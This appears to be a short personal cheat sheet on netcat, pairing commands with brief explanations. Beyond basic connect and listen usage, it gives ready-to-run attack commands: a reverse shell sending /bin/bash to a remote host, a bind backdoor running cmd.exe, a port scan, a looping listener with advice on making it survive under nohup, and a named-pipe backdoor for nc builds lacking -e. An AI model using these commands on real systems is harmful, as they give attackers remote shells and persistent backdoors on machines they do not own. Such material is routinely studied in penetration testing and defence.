Netcat

Netcat rocks my socks

Basics

Connect to a socket on host 192.168.1.1 on TCP port 81

nc 192.168.1.1 81

Listen on the local machine for inbound TCP connections on port 81

nc -nvlp 81

Reverse shell sent to host 10.0.0.2 over TCP port 53

nc 10.0.0.2 53 -e /bin/bash

Backdoor listening on TCP 80 set to execute cmd.exe when connected

nc -nvlp 80 -e cmd.exe

More Fancy

Attempt to connect to each port from 10 to 90 on 10.0.0.1: -n skips name resolution, -z sends no data (it only checks whether the port accepts a connection), and -w1 waits at most 1 second for each connection

nc -nvzw1 10.0.0.1 10-90

Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing nc in a bash loop that always evaluates true is an easy way to work around this; run it under nohup as well so it survives the session ending!

while true; do echo "started"; nc -l -p 1234 -e /bin/sh; done

Netcat relay: everything received on local TCP 4321 is forwarded to 10.0.0.1 on TCP 8123 (one direction only, since the second nc's output goes to the terminal rather than back to the first)

nc -l -p 4321 | nc 10.0.0.1 8123

Create a netcat backdoor on a build of nc without -e support. This creates a named pipe (mknod with type p; mkfifo backpipe does the same) and uses it to funnel data between bash and nc: bash reads its commands from the pipe, bash's output is piped into nc's stdin, and whatever nc receives is written back into the pipe.

mknod backpipe p
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe